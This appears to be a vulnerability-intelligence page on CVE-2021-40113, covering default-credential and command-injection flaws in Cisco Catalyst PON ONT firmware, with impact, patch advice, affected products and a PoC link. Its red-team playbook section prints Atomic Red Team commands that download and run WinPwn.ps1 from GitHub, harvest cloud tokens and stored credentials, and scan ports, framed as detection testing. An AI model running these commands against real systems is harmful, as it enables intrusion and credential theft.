CVE-2021-40113
Overview
The vulnerability stems from multiple flaws in the web-based management interface of Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT). These include improper authentication controls allowing login via default credentials when Telnet is enabled, and insufficient input validation enabling command injection. The affected component is the ONT firmware managing network configurations and command execution through exposed protocols and interfaces.
Vulnerability Description
Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) could allow an unauthenticated, remote attacker to perform the following actions: Log in with a default credential if the Telnet protocol is enabled Perform command injection Modify the configuration For more information about these vulnerabilities, see the Details section of this advisory.
Impact
An attacker with network access can remotely authenticate without credentials if Telnet is enabled and execute arbitrary commands on the affected ONT devices. This results in full control over device configuration, potentially leading to network disruption, unauthorized data manipulation, and lateral movement within the network. No user interaction or prior privileges are required, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H.
Solution
Cisco has released firmware updates addressing these vulnerabilities for the Catalyst PON Series ONT models. Users should apply the patches as detailed in Cisco Security Advisory cisco-sa-catpon-multivulns-CE3DSYGr. The advisory provides version-specific firmware upgrades and recommends disabling Telnet if not required to mitigate risk until patches are applied.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerabilities present in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) expose critical security weaknesses that can be exploited by malicious actors. These vulnerabilities allow unauthenticated remote attackers to gain unauthorized access to the devices, especially if the Telnet protocol is enabled. The use of default credentials further exacerbates this issue, as it provides an easy entry point for attackers. Once inside, they can execute command injection attacks, which enable them to manipulate the system's behavior, potentially leading to unauthorized configuration changes and the compromise of network integrity.
Attack vectors associated with these vulnerabilities are particularly concerning due to their simplicity and effectiveness. An attacker could leverage the enabled Telnet service to attempt a login using default credentials, which are often poorly managed in many organizations. Once authenticated, the attacker can execute arbitrary commands on the device, leading to a broad range of malicious activities. For instance, they could alter network configurations, redirect traffic, or even disable critical services. The ability to modify configurations poses a significant risk, as it can disrupt network operations and facilitate further attacks on connected devices or networks.
The real-world impact of these vulnerabilities is profound, particularly for organizations that rely on Cisco's PON switches for their network infrastructure. The potential for unauthorized access and configuration manipulation can lead to severe business risks, including data breaches, loss of service availability, and reputational damage. Organizations may face regulatory repercussions if sensitive data is compromised or if they fail to maintain adequate security measures. Moreover, the financial implications of such incidents can be substantial, encompassing recovery costs, legal fees, and potential fines.
To detect and mitigate these vulnerabilities, organizations should adopt a multi-faceted approach. Regularly auditing network devices for default credentials and disabling unnecessary services, such as Telnet, is crucial. Implementing strong password policies and ensuring that all default credentials are changed upon installation can significantly reduce the risk of unauthorized access. Additionally, deploying intrusion detection systems (IDS) can help identify suspicious activities, such as unauthorized login attempts or command injections. Regular software updates and patches from Cisco should also be applied promptly to address known vulnerabilities and enhance security posture.
In conclusion, the vulnerabilities within the Cisco Catalyst PON Series Switches ONT present a significant threat to network security. The ease of exploitation and the potential for severe consequences necessitate immediate attention from organizations utilizing these devices. By implementing robust security measures and maintaining vigilance, organizations can protect their networks from the risks associated with these vulnerabilities, thereby safeguarding their operational integrity and customer trust.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Catalyst Pon Switch Cgp-Ont-1p Firmware | All |
cpe:2.3:o:cisco:catalyst_pon_switch_cgp-ont-1p_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Pon Switch Cgp-Ont-4p Firmware | All |
cpe:2.3:o:cisco:catalyst_pon_switch_cgp-ont-4p_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Pon Switch Cgp-Ont-4pvc Firmware | All |
cpe:2.3:o:cisco:catalyst_pon_switch_cgp-ont-4pvc_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Pon Switch Cgp-Ont-4tvcw Firmware | All |
cpe:2.3:o:cisco:catalyst_pon_switch_cgp-ont-4tvcw_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Pon Switch Cgp-Ont-4pv Firmware | All |
cpe:2.3:o:cisco:catalyst_pon_switch_cgp-ont-4pv_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
karamMahmad/CVE-2021-40113
Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Serie...
|
karamMahmad | 0 | 1 | 2023-01-30 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-40113 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-catpon-multivulns-CE3DSYGr |